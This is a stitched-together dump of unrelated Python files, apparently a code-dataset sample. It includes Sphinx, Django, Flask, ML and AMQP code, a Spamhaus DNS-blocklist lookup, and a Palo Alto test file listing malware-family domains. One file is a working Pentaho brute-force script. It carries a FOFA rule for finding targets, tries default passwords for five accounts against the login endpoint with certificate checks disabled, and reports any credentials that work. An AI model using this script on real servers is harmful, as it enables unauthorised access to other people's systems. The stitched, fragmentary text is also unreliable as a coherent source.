IO Event Loop ## ----------------------------------------------------------------------- pubnub.start()
nilq/baby-python
python
# Configuration file for the Sphinx documentation builder. # # For a full list of configuration options, see the documentation: # http://www.sphinx-doc.org/en/master/usage/configuration.html # Project information # -------------------------------------------------- project = 'Apollo' version = '0.2.0' release = '' copyright = '2018, Georgia Power Company' author = 'Chris Barrick, Zach Jones, Fred Maier' # Configuration # -------------------------------------------------- needs_sphinx = '1.7' # v1.7.0 was released 2018-02-12 master_doc = 'index' language = 'en' pygments_style = 'sphinx' templates_path = ['_templates'] source_suffix = ['.rst'] exclude_patterns = ['_build', '_static', 'Thumbs.db', '.DS_Store'] extensions = [ 'sphinx.ext.autodoc', 'sphinx.ext.autosummary', 'sphinx.ext.coverage', 'sphinx.ext.doctest', 'sphinx.ext.githubpages', 'sphinx.ext.ifconfig', 'sphinx.ext.intersphinx', 'sphinx.ext.mathjax', 'sphinx.ext.napoleon', 'sphinx.ext.todo', 'sphinx.ext.viewcode', ] # Theme # -------------------------------------------------- html_theme = 'sphinx_rtd_theme' html_logo = '_static/logo/apollo-logo-text-color.svg' html_static_path = ['_static'] html_css_files = ['css/overrides.css'] # Theme specific, # see https://sphinx-rtd-theme.readthedocs.io/en/latest/configuring.html html_theme_options = { 'logo_only': True, 'display_version': True, 'style_nav_header_background': '#EEEEEE', # Sidebar 'collapse_navigation': False, 'sticky_navigation': True, 'navigation_depth': 3, 'includehidden': True, 'titles_only': False } # Extension: sphinx.ext.intersphinx # -------------------------------------------------- # A mapping: id -> (target, invintory) # where target is the base URL of the target documentation, # and invintory is the name of the inventory file, or None for the default. intersphinx_mapping = { 'python': ('https://docs.python.org/3', None), 'numpy': ('https://docs.scipy.org/doc/numpy/', None), 'scipy': ('https://docs.scipy.org/doc/scipy/reference/', None), 'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None), 'matplotlib': ('https://matplotlib.org/', None), 'xarray': ('http://xarray.pydata.org/en/stable/', None), 'sklearn': ('http://scikit-learn.org/stable', None), } # Extension: sphinx.ext.autodoc # -------------------------------------------------- autodoc_default_options = { 'members': True, } # Extension: sphinx.ext.autosummary # -------------------------------------------------- autosummary_generate = True autosummary_generate_overwrite = True # Extension: sphinx.ext.napoleon # -------------------------------------------------- napoleon_google_docstring = True napoleon_numpy_docstring = False napoleon_use_param = False napoleon_use_rtype = False # Extension: sphinx.ext.todo # -------------------------------------------------- # Toggle output for ..todo:: and ..todolist:: todo_include_todos = True # Path setup # -------------------------------------------------- # All extensions and modules to document with autodoc must be in sys.path. def add_path(path): '''Add a directory to the import path, relative to the documentation root. ''' import os import sys path = os.path.abspath(path) sys.path.insert(0, path) add_path('..') # The root of the repo, puts the `apollo` package on the path.
nilq/baby-python
python
from bson.objectid import ObjectId from pymongo import MongoClient def readValue(value): try: return float(value) except ValueError: pass try: return int(value) except ValueError: pass return value def run(host=None, db=None, coll=None, key=None, prop=None, value=None): # Connect to the Mongo collection client = MongoClient(host) db = client[db] graph = db[coll] value = readValue(value) graph.update({"_id": ObjectId(key)}, {"$set": {"data.%s" % (prop): value}})
nilq/baby-python
python
from flask import Flask, render_template, Blueprint from modules.BBCScraper import BBCScraper from modules.MaanScraper import MaanHealthScraper from modules.MOHScraper import CovidPalestine from modules.MaanScraper import MaanNewsScraper import time import concurrent.futures from modules.CovidScraper import BBCCovidScraper, WhoCovidScraper covid = Blueprint('covid', __name__) @covid.route('/covid19') def load_covid(): start = time.perf_counter() with concurrent.futures.ThreadPoolExecutor() as executer: # f1 = executer.submit(MaanNewsScraper.get_covid_status) f2 = executer.submit(BBCCovidScraper.get_content) f3 = executer.submit(WhoCovidScraper.get_content) # palestine_summary = f1.result() bbc_corona_articles = f2.result() who_corona_articles = f3.result() finish = time.perf_counter() # end timer print(f"Finished in {round(finish-start,2)} seconds") return render_template("covid/covid19.html", bbc_corona_articles=bbc_corona_articles, who_corona_articles=who_corona_articles )
nilq/baby-python
python
from fractions import Fraction def answer(pegs): arrLength = len(pegs) if ((not pegs) or arrLength == 1): return [-1,-1] even = True if (arrLength % 2 == 0) else False sum = (- pegs[0] + pegs[arrLength - 1]) if even else (- pegs[0] - pegs[arrLength -1]) # print sum if (arrLength > 2): for index in xrange(1, arrLength-1): sum += 2 * (-1)**(index+1) * pegs[index] # print sum FirstGearRadius = Fraction(2 * (float(sum)/3 if even else sum)).limit_denominator() print(FirstGearRadius) currentRadius = FirstGearRadius for index in xrange(0, arrLength-2): CenterDistance = pegs[index+1] - pegs[index] NextRadius = CenterDistance - currentRadius if (currentRadius < 1 or NextRadius < 1): return [-1,-1] else: currentRadius = NextRadius return [FirstGearRadius.numerator, FirstGearRadius.denominator] if __name__ == "__main__": l = map(int,raw_input().split()) print(answer(l)) # print answer([4, 9, 17, 31, 40]) # print answer([4,30,50])
nilq/baby-python
python
#!/usr/bin/env python # coding: utf-8 # In[1]: import pandas as pd # In[2]: df=pd.read_csv('car_data.csv') # In[3]: df.head() # In[5]: df.shape # In[6]: print(df['Seller_Type'].unique()) # In[26]: print(df['Transmission'].unique()) print(df['Owner'].unique()) print(df['Fuel_Type'].unique()) # In[8]: # check missing or null values df.isnull().sum() # In[9]: df.describe() # In[11]: df.columns # In[12]: final_dataset=df[['Year', 'Selling_Price', 'Present_Price', 'Kms_Driven','Fuel_Type', 'Seller_Type', 'Transmission', 'Owner']] # In[13]: final_dataset.head() # In[14]: final_dataset['Current_Year']=2020 # In[15]: final_dataset.head() # In[16]: final_dataset['no_of_year']=final_dataset['Current_Year']-final_dataset['Year'] # In[17]: final_dataset.head() # In[19]: final_dataset.drop(['Year'],axis=1,inplace=True) # In[20]: final_dataset.head() # In[21]: final_dataset.drop(['Current_Year'],axis=1,inplace=True) # In[22]: final_dataset.head() # In[30]: final_dataset=pd.get_dummies(final_dataset,drop_first=True) # In[31]: final_dataset.head() # In[32]: final_dataset.corr() # In[33]: import seaborn as sns # In[34]: sns.pairplot(final_dataset) # In[35]: import matplotlib.pyplot as plt get_ipython().run_line_magic('matplotlib', 'inline') # In[37]: corrmat=final_dataset.corr() top_corr_features=corrmat.index plt.figure(figsize=(20,20)) #plot heat map g=sns.heatmap(final_dataset[top_corr_features].corr(),annot=True,cmap="RdYlGn") # In[59]: final_dataset.head() # In[60]: # independent and dependent features X=final_dataset.iloc[:,1:] y=final_dataset.iloc[:,0] # In[61]: X.head() # In[62]: y.head() # In[63]: # ordering of features importance from sklearn.ensemble import ExtraTreesRegressor model=ExtraTreesRegressor() model.fit(X,y) # In[64]: print(model.feature_importances_) # In[65]: # plot graph of feature importance for visualzation feat_importances=pd.Series(model.feature_importances_,index=X.columns) feat_importances.nlargest(5).plot(kind='barh') plt.show() # In[67]: from sklearn.model_selection import train_test_split X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2) # In[69]: X_train.shape # In[70]: from sklearn.ensemble import RandomForestRegressor rf_random = RandomForestRegressor() # In[78]: # Hyperparameters # Randomized Search CV # Number Of trees in random forest import numpy as np n_estimators=[int(x) for x in np.linspace(start = 100,stop = 1200,num = 12)] #Number of features to consider at every split max_features=['auto','sqrt'] # Maximum number of levels in a tree max_depth =[int(x) for x in np.linspace(5, 30,num =6)] # max_depth.append(None) # Minimum number of samples required to split a node min_samples_split =[2,5,10,15,100] # Minimum number of samples required to split each leaf node min_samples_leaf = [1,2,5,10] # In[79]: from sklearn.model_selection import RandomizedSearchCV # In[80]: # create random grid random_grid = {'n_estimators':n_estimators, 'max_features':max_features, 'max_depth':max_depth, 'min_samples_split':min_samples_split, 'min_samples_leaf':min_samples_leaf} print(random_grid) # In[83]: # use random grid to search for best hyperparameters # first create the base model to tune rf=RandomForestRegressor() # In[85]: rf_random = RandomizedSearchCV(estimator = rf,param_distributions = random_grid,scoring ='neg_mean_squared_error',n_iter=10,cv=5,verbose=2,random_state=42,n_jobs =1) # In[86]: rf_random.fit(X_train,y_train) # In[87]: predictions = rf_random.predict(X_test) # In[88]: predictions # In[89]: sns.distplot(y_test-predictions) # In[90]: plt.scatter(y_test,predictions) # In[92]: import pickle # open a file where you want to store data file=open('random_forest_regression_model.pkl' , 'wb') #dump information to that file pickle.dump(rf_random,file) # In[ ]: # In[ ]: # In[ ]:
nilq/baby-python
python
from PIL import Image import numpy as np import time def renk_degisimi(): h=pic.shape[0] w=pic.shape[1] newpic=np.zeros((h ,w )) for i in range(h): for j in range(w): newpic[i][j]+=pic[i][j][0]*0.2989+pic[i][j][1]*0.5870+pic[i][j][2]*0.1140 matrix2=[] for i in range(3): b =[] for j in range(3): b.append(int(input())) matrix2.append(b) def kirpma(): x1=int(input("x1 değerini giriniz: ")) def terscevir(): tersfoto = pic.copy() tersfotos=tersfoto[::-1] son=Image.fromarray(tersfotos) son.show() secim=input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ") while secim!="1" and secim!="2" and secim!="3" and secim!="4": time.sleep(1) print() print("Lütfen seçeneklerden birini giriniz.") print() time.sleep(1) secim=input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ") print() while secim=="2" or secim=="3": time.sleep(0.5) print("İşlem yapmadan önce resim yüklemeniz gerekmektedir\n") time.sleep(1) secim=input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ") while secim!="1" and secim!="2" and secim!="3" and secim!="4": print("Lütfen seçeneklerden birini giriniz.") secim=input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ") while True: while secim=="1": picture=input("Lütfen yüklemek istediğiniz resmin adını giriniz(örnek: resim.jpg): ") print() time.sleep(1) print("{} resmi yüklendi".format(picture)) print() time.sleep(1) picture_open=Image.open(picture) pic=np.array(picture_open) secim=input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ") while secim!="1" and secim!="2" and secim!="3" and secim!="4": print("Lütfen seçeneklerden birini giriniz.") secim=input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ") print() while secim=="2": renk_degisimi() secim=input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ") while secim!="1" and secim!="2" and secim!="3" and secim!="4": print("Lütfen seçeneklerden birini giriniz.") secim=input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ") print() while secim=="3": terscevir() secim=input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ") while secim!="1" and secim!="2" and secim!="3" and secim!="4": print("Lütfen seçeneklerden birini giriniz.") secim=input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ") print() while secim=="4": print("Çıkış yapılıyor.") time.sleep(1) quit()
nilq/baby-python
python
from django.shortcuts import render, redirect from django.contrib.auth import login, authenticate,logout from django.http import HttpResponse from account.forms import AccountAuthenticationForm, RegistrationForm,AccountUpdateForm from django.contrib import messages from django.conf import settings from django.contrib.auth.models import User from account.models import Account from posts.models import Post from posts.forms import PostModelForm import random from django.views.generic import ( DetailView ) ''' def profiles(request): data =Post.objects.all() paginate_by = 2 ordering = ['post_date'] return render(request,'account/account.html',{'data':data}) ''' def Userfeed(request): allposts=Post.objects.all() # details=Post.objects.get(id=id) # posts_form = PostModelForm() # if request.method == 'POST': # posts_form = PostModelForm(request.POST ) # if posts_form.is_valid(): # content = request.POST.get('content') # # image = request.POST.get('image') # # comment = PostModelForm.objects.create(post = Post, user = request.user, content = content) # posts_form .save() # return redirect("baseapp:details" ) # else: # posts_form = PostModelForm() # initials p_form = PostModelForm() post_added = False # profile = Account.objects.get(user=request.user) # profile= self.request.usersettings.AUTH_USER_MODEL profile = request.user if 'submit_p_form' in request.POST: print(request.POST) p_form = PostModelForm(request.POST, request.FILES) if p_form.is_valid(): instance = p_form.save(commit=False) instance.writer = profile instance.save() p_form = PostModelForm() post_added = True # ppp= Account.objects.all() profiles = [] all_posts = list(Account.objects.all()) # random_post_number = post_number - len(profiles) # random_posts = random.sample(all_posts, random_post_number) random_posts = random.sample(all_posts, 3) for random_post in random_posts: profiles.append(random_post) # return post_objects context = { 'allposts': allposts, 'p_form': p_form, 'profiles': profiles, 'post_added': post_added, } return render(request, 'users/userfeed.html', context) class ProfileDetailView(DetailView): model = Account context_object_name = 'my_profile' template_name = 'account/account.html' def get_object(self,**kwargs): pk= self.kwargs.get('pk') view_profile = Account.objects.get(pk=pk) return view_profile def edit_account_view(request, *args, **kwargs): if not request.user.is_authenticated: return redirect("login") user_id = kwargs.get("user_id") account = Account.objects.get(pk=user_id) if account.pk != request.user.pk: return HttpResponse("You cannot edit someone elses profile.") context = {} if request.POST: form = AccountUpdateForm(request.POST, request.FILES, instance=request.user) if form.is_valid(): form.save() new_username = form.cleaned_data['username'] return redirect("account:profile-page") else: form = AccountUpdateForm(request.POST, instance=request.user, initial={ "id": account.pk, "email": account.email, "username": account.username, "profile_image": account.profile_image, "hide_email": account.hide_email, "bio": account.bio, "full_name": account.full_name, } ) context['form'] = form else: form = AccountUpdateForm( initial={ "id": account.pk, "email": account.email, "username": account.username, "profile_image": account.profile_image, "bio": account.bio, "full_name": account.full_name, } ) context['form'] = form context['DATA_UPLOAD_MAX_MEMORY_SIZE'] = settings.DATA_UPLOAD_MAX_MEMORY_SIZE return render(request, "account/edit_account.html", context) def registration_view(request, *args, **kwargs): context = {} if request.POST: form = RegistrationForm(request.POST) if form.is_valid(): form.save() # email = form.cleaned_data.get('email') # raw_password = form.cleaned_data.get('password1') # accounts = authenticate(email=email, password=raw_password) # login(request, accounts) return redirect('account:login') else: context['registration_form'] = form else: #GET request form = RegistrationForm() context['registration_form'] = form return render(request, 'account/register.html', context) def login_view(request, *args, **kwargs): context = {} user = request.user if user.is_authenticated: return redirect("account:profile-page") if request.POST: form = AccountAuthenticationForm(request.POST) if form.is_valid(): email = request.POST['email'] password = request.POST['password'] user = authenticate(email=email, password=password) if user: login(request, user) return redirect("account:profile-page") else: form = AccountAuthenticationForm() context['login_form'] = form return render(request, 'account/login.html', context) def logout_view(request, *args, **kwargs): logout(request) return render(request,'account/logout.html')
nilq/baby-python
python
import numpy as np import cv2 from skimage import segmentation def runGrabCut(_image, boxes, indices): imgs = [] image = _image.copy() # ensure at least one detection exists indices = len(boxes) if indices > 0: # loop over the indices we are keeping for i in range(0,indices): image = _image.copy() mask = np.zeros(_image.shape[:2], np.uint8) bgdModel = np.zeros((1, 65), np.float64) fgbModel = np.zeros((1, 65), np.float64) # extract the bounding box coordinates rect = (int(boxes[i][0]), int(boxes[i][1]), int(boxes[i][2]), int(boxes[i][3])) # outline = segmentation.slic(_image, n_segments=100,enforce_connectivity=False) print('rect',rect) # print(boxes) # apply GrabCut cv2.grabCut(image, mask, rect, bgdModel, fgbModel, 3, cv2.GC_INIT_WITH_RECT) # 0和2做背景 grab_mask = np.where((mask == 2) | (mask == 0), 0, 1).astype('uint8') # 使用蒙板来获取前景区域 image = image * grab_mask[:, :, np.newaxis] # regions = outline*grab_mask # segmented = np.unique(regions) # print('segmented',segmented) # cv2.imshow('segmented',segmented) # segmented = segmented[1:len(segmented)] # pxtotal = np.bincount(outline.flatten()) # pxseq = np.bincount(regions.flatten()) # # # pxseg = np.bincount(regions.flatten()) # seg_mask = np.zeros(_image.shape[:2], np.uint8) # label = (pxseg[segmented] / pxtotal[segmented].astype(float)) < 0.75 # for j in range(0, len(label)): # if label[j] == 0: # temp = outline == segmented[j] # seg_mask = seg_mask + temp # mask = seg_mask > 0 # mask = np.where((mask == 1), 255, 0).astype("uint8") # mask = cv2.bitwise_not(mask) # cv2.imshow('mask', mask) # cv2.waitKey() imgs.append(image) # imgs = image|image # cv2.bitwise_xor(image, image) return imgs if __name__ == '__main__': import argparse ap = argparse.ArgumentParser() ap.add_argument("-i", "--image", required=True, help="path to input image") ap.add_argument("-y", "--yolo", required=True, help="base path to YOLO directory") ap.add_argument("-c", "--confidence", type=float, default=0.25, help="minimum probability to filter weak detections") ap.add_argument("-t", "--threshold", type=float, default=0.45, help="threshold when applying non-maxima suppression") args = vars(ap.parse_args()) import yolo img, boxes, idxs = yolo.runYOLOBoundingBoxes(args) images = runGrabCut(img, boxes, idxs) # show the output images #cv.namedWindow("Image", cv.WINDOW_NORMAL) #cv.resizeWindow("image", 1920, 1080) for i in range(len(images)): cv2.imshow("Image{}".format(i), images[i]) cv2.imwrite("grabcut{}.jpg".format(i), images[i]) cv2.waitKey(0)
nilq/baby-python
python
""" Copyright Tiyab KONLAMBIGUE Licensed under the BSD 3-Clause "New" or "Revised" license; you may not use this file except in compliance with the License. You may obtain a copy of the License at : https://opensource.org/licenses/BSD-3-Clause """ from google.appengine.ext import ndb class Job(ndb.Model): creation = ndb.DateTimeProperty(auto_now_add=True) updated = ndb.DateTimeProperty(auto_now=True) emails = ndb.StringProperty() project_id = ndb.StringProperty() bucket_id = ndb.StringProperty() machine_name = ndb.StringProperty() startup_script = ndb.StringProperty() shutdown_script = ndb.StringProperty() machine_type = ndb.StringProperty() machine_zone = ndb.StringProperty() machine_os = ndb.StringProperty() cron_schedule = ndb.StringProperty() after_run = ndb.StringProperty() max_running_time = ndb.StringProperty() job_name = ndb.StringProperty() job_status = ndb.StringProperty() last_run = ndb.DateTimeProperty() # Get list of job @classmethod def query(self, query, max_line): results = [] query = ndb.GqlQuery(query) for query_line in query.run(limit=max_line): results.append(query_line) return results # Get job def get(self, filtering): results = [] query = self.gql(filtering) for query_line in query: results.append(query_line) return results def to_dict(self): return { "key": self.key.urlsafe() if self.key else None, "creation": str(self.creation) if self.creation else None, "updated": str(self.updated) if self.updated else None, "emails": str(self.emails) if self.emails else None, "project": str(self.project) if self.project else None, "bucket_id": str(self.bucket_id) if self.bucket_id else None, "machine_name": str(self.machine_name) if self.machine_name else None, "startup_script": str(self.startup_script) if self.startup_script else None, "shutdown_script": str(self.shutdown_script) if self.shutdown_script else None, "machine_type": str(self.machine_type) if self.machine_type else None, "machine_zone": str(self.machine_zone) if self.machine_zone else None, "machine_os": str(self.machine_os) if self.machine_os else None, "after_run": str(self.after_run) if self.after_run else None, "cron_schedule": str(self.cron_schedule) if self.cron_schedule else None, "max_running_time": str(self.max_running_time) if self.max_running_time else None, "job_name": str(self.job_name) if self.job_name else None, "job_status": str(self.job_status) if self.job_status else None, "last_run": str(self.last_run) if self.last_run else None, } ## JOB TO RUN QUEUE class Queue(ndb.Model): creation = ndb.DateTimeProperty(auto_now_add=True) project_id = ndb.StringProperty() bucket_id = ndb.StringProperty() machine_name = ndb.StringProperty() machine_type = ndb.StringProperty() machine_zone = ndb.StringProperty() machine_os = ndb.StringProperty() after_run = ndb.StringProperty() max_running_time = ndb.StringProperty() job_name = ndb.StringProperty() # Get list of job @classmethod def query(self, query, max_line): results = [] query = ndb.GqlQuery(query) for query_line in query.run(limit=max_line): results.append(query_line) return results # Get job def get(self, filtering): results = [] query = self.gql(filtering) for query_line in query: results.append(query_line) return results def to_dict(self): return { "key": self.key.urlsafe() if self.key else None, "creation": str(self.creation) if self.creation else None, "project": str(self.project) if self.project else None, "bucket_id": str(self.bucket_id) if self.bucket_id else None, "machine_name": str(self.machine_name) if self.machine_name else None, "machine_type": str(self.machine_type) if self.machine_type else None, "machine_zone": str(self.machine_zone) if self.machine_zone else None, "machine_os": str(self.machine_os) if self.machine_os else None, "after_run": str(self.after_run) if self.after_run else None, "max_running_time": str(self.max_running_time) if self.max_running_time else None, "job_name": str(self.job_name) if self.job_name else None, "job_status": str(self.job_status) if self.job_status else None, }
nilq/baby-python
python
#!/usr/bin/env python # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # from __future__ import print_function, unicode_literals import optparse from proton import Message from proton.handlers import MessagingHandler from proton.reactor import Container # Helper Functions def get_options(): #parse cmd arguments parser = optparse.OptionParser(usage="usage: %prog [options]", description="Sends messages to a topic on the amqp broker") parser.add_option("-u", "--url", action="store", default="amqp://localhost:5672", help="Url to connect to amqp broker (default %default)") parser.add_option("-t", "--topic", action="store", default="a/topic", help="Topic to send message (default %default)") parser.add_option("-m", "--messages", type="int", default=100, help="number of messages to receive (default %default)") parser.add_option("-o", "--username", default=None, help="username for authentication (default %default)") parser.add_option("-p", "--password", default=None, help="password for authentication (default %default)") (options, args) = parser.parse_args() return options """ Proton event Handler class Establishes an amqp connection and creates an amqp sender link to transmit messages """ class MessageProducer(MessagingHandler): def __init__(self, url, address, count, username, password): super(MessageProducer, self).__init__() # the solace message broker amqp url self.url = url # the prefix amqp address for a solace topic self.topic_address = address # authentication credentials self.username = username self.password = password self.total = count self.sent = 0 self.confirmed = 0 def on_start(self, event): # select authentication from SASL PLAIN or SASL ANONYMOUS if self.username: # creates and establishes amqp connection using PLAIN authentication conn = event.container.connect(url=self.url, user=self.username, password=self.password, allow_insecure_mechs=True) else: # creates and establishes amqp connection using ANONYMOUS authentication conn = event.container.connect(url=self.url) if conn: # creates sender link to transfer message to the broker event.container.create_sender(conn, target=self.topic_address) def on_sendable(self, event): while event.sender.credit and self.sent < self.total: # the durable property on the message sends the message as a persistent message event.sender.send(Message(body="hello "+str(self.sent), durable=True)) self.sent += 1 def on_accepted(self, event): self.confirmed += 1 if self.confirmed == self.total: print('confirmed all messages') event.connection.close() def on_rejected(self, event): self.confirmed += 1 print("Broker", self.url, "Reject message:", event.delivery.tag, "Remote disposition:", event.delivery.remote.condition) if self.confirmed == self.total: event.connection.close() # receives socket or authentication failures def on_transport_error(self, event): print("Transport failure for amqp broker:", self.url, "Error:", event.transport.condition) MessagingHandler.on_transport_error(self, event) # get program options options = get_options() """ The amqp address can be a topic or a queue. Use 'topic://' prefix in the amqp address for the amqp sender target address to indicate which topic message are sent to. """ amqp_address = 'topic://' + options.topic try: # starts the proton container event loop with the MessageProducer event handler Container(MessageProducer(options.url, amqp_address, options.messages, options.username, options.password)).run() except KeyboardInterrupt: pass
nilq/baby-python
python
# tuples are lists but immutable # the syntax is ( parenthesis ) # list l = [1,2,3] l[0] = 5 # you can do this print(type(l)) print(l) # tuple t = (1,2,3) # t[0] = 5 # you can't do this print(type(t)) print(t) # tuples only have two methods, a lot less than lists t = ('a', 'a', 'b', 'b', 'c', 'c') print(f"the amount of instances of the character 'a' in the tuple is {t.count('a')}") print(f"the first index in the tuple that has the character 'c' is {t.index('c')}")
nilq/baby-python
python
import sys import re from functools import partial def flush_print(st, *args, **kwargs): end = kwargs.pop('end', '\n') if args: st = st % args print(st, end=end) if sys.stdout.isatty(): sys.stdout.flush() def cprint(color_fn, st, *args): if args: st = st % args print(color_fn(st), end='') sys.stdout.flush() def dot_lead(st, *args, **kwargs): width = kwargs.pop('width', 60) if args: st = st % args dots = '.' * (width - len(st)) return '%s%s' % (st, dots) def dot_leader(st, *args, **kwargs): width = kwargs.pop('width', 60) if args: st = st % args dots = '.' * (width - len(st)) flush_print('%s%s', st, dots, **kwargs) COLORS = ( 'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white') STYLES = ( 'bold', 'faint', 'italic', 'underline', 'blink', 'blink2', 'negative', 'concealed', 'crossed') def _ansi_color(x, offset, ansi_code): if x: if x in COLORS: return [ f'{offset + COLORS.index(x)}' ] if isinstance(x, int) and 0 <= x <= 255: return [ f'{ansi_code};5;{x}' ] raise Exception('Invalid color [{x}]') return [] def _style_codes(style): codes = [] if style: for st in style.split('+'): if st in STYLES: codes.append(f'{(1 + STYLES.index(st))}') else: raise Exception('Invalid style "{st}"') return codes def color(s, fg=None, bg=None, style=None): sgr = _ansi_color(fg, 30, 38) + _ansi_color(bg, 40, 48) sgr += _style_codes(style) if sgr: return f"\x1b[{';'.join(sgr)}m{s}\x1b[0m" return s def strip_color(s): return re.sub(r'\x1b\[.+?m', '', s) # Foreground shortcuts black = partial(color, fg='black') red = partial(color, fg='red') green = partial(color, fg='green') yellow = partial(color, fg='yellow') blue = partial(color, fg='blue') magenta = partial(color, fg='magenta') cyan = partial(color, fg='cyan') white = partial(color, fg='white') # Style shortcuts bold = partial(color, style='bold') faint = partial(color, style='faint') italic = partial(color, style='italic') underline = partial(color, style='underline') blink = partial(color, style='blink') blink2 = partial(color, style='blink2') negative = partial(color, style='negative') concealed = partial(color, style='concealed') crossed = partial(color, style='crossed')
nilq/baby-python
python
#!/usr/bin/env python print("hi from Python 3")
nilq/baby-python
python
"""Background job to perform a DNS lookup and insert into or update in the db. Attributes: DNS_SERVERS: A list of strs representing which DNS servers to use DNS_BLOCKLIST: A str representing the blocklist to send a DNS lookup to """ import dns.resolver from models import IPDetails, ResponseCode # Spamhaus will not work with Google's public DNS servers # https://www.spamhaus.org/faq/section/DNSBL%20Usage#261 DNS_SERVERS = ["208.67.222.222"] # OpenDNS DNS_BLOCKLIST = "zen.spamhaus.org" def upsert_ip_details(ip_address): """Insert or update an IPDetails record in the db. Args: ip_address: A str representing the record in the db to insert or update """ response_codes = dns_lookup(ip_address) ip_details = IPDetails.query.filter_by(ip_address=ip_address).first() if ip_details is None: ip_details = IPDetails( response_codes=response_codes, ip_address=ip_address ) ip_details.insert() else: ip_details.response_codes = response_codes ip_details.update() def dns_lookup(ip_address): """Perform a DNS lookup of an IP address to a blocklist. Args: ip_address: A str representing the ip address to perform a DNS lookup against a blocklist Returns: response_codes: A list of ResponseCode objects representing the returned response codes from the DNS lookup against a blocklist """ ip_address = ip_address.split(".") if len(ip_address) != 4 or not all(num.isnumeric() for num in ip_address): raise TypeError("Incorrect format for IPv4 IP Address") ip_address = ".".join(reversed(ip_address)) response_codes = [] dns.resolver.get_default_resolver().nameservers = DNS_SERVERS try: answer = dns.resolver.resolve(f"{ip_address}.{DNS_BLOCKLIST}") except dns.resolver.NXDOMAIN: return response_codes for data in answer: response_code = ResponseCode.query.filter_by( response_code=str(data) ).first() if response_code is None: response_code = ResponseCode(response_code=str(data)) response_code.insert() response_codes.append(response_code) return response_codes
nilq/baby-python
python
from scrapy import cmdline if __name__ == '__main__': # cmdline.execute('scrapy crawl xinFang'.split()) # cmdline.execute('scrapy crawl erShouFang'.split()) cmdline.execute('scrapy crawl zuFang'.split())
nilq/baby-python
python
from .build_model import add_weights, build_model
nilq/baby-python
python
#!/usr/bin/env python3 # _*_ coding:utf-8 _*_ import requests from Config.config_requests import ua requests.packages.urllib3.disable_warnings() # 脚本信息 ###################################################### NAME = 'pentaho_bruteforce' AUTHOR = "Trans" REMARK = 'pentaho密码爆破' FOFA_RULE = 'app="pentaho"' ###################################################### def poc(target): result={} url = target + "/pentaho" refer = url+ "/Login" url += "/j_spring_security_check" login_headers = { "User-Agent": ua, "Referer": refer } webapp_usernames = {'admin':'password', 'joe': 'password', 'suzy': 'password', 'tiffany':'password', 'pat': 'password' } for user in webapp_usernames: path_store = ['/public/plugin-samples', '/public/bi-developers'] login_data = {"j_username": user, "j_password": webapp_usernames[user], "locale": "en_US"} response = requests.post(url, headers=login_headers, data=login_data,verify=False,timeout=5) if '/Home' in response.url: print('Logging in as '+ user + ' / ' + webapp_usernames[user]) result['target'] = target result['username'] = user result['password'] = webapp_usernames[user] return result if __name__ == '__main__': poc("http://127.0.0.1:3312")
nilq/baby-python
python
# Copyright (c) 2019, Palo Alto Networks # # Permission to use, copy, modify, and/or distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. # Author: Giselle Serate <gserate@paloaltonetworks.com> ''' Palo Alto Networks testcases.py Defines parameters for the test. Include this file; do not run it directly. This software is provided without support, warranty, or guarantee. Use at your own risk. ''' class ParseTest(): def __init__(self): # Static version notes metadata self.version = '3026-3536' self.version_date = '2019-07-01T04:00:52-07:00' # If we process this much or more, we pass self.percent_processed = 0.5 # Establish cases to check are in the database. self.cases = [{'raw': 'None:gacyqob.com', 'action': 'added'}, {'raw': 'Backdoor.simda:gahyraw.com', 'action': 'added'}, {'raw': 'None:pupycag.com', 'action': 'added'}, {'raw': 'PWS.simda:qetyhyg.com', 'action': 'added'}, {'raw': 'Backdoor.simda:vojykom.com', 'action': 'added'}, {'raw': 'Backdoor.simda:vowygem.com', 'action': 'added'}, {'raw': 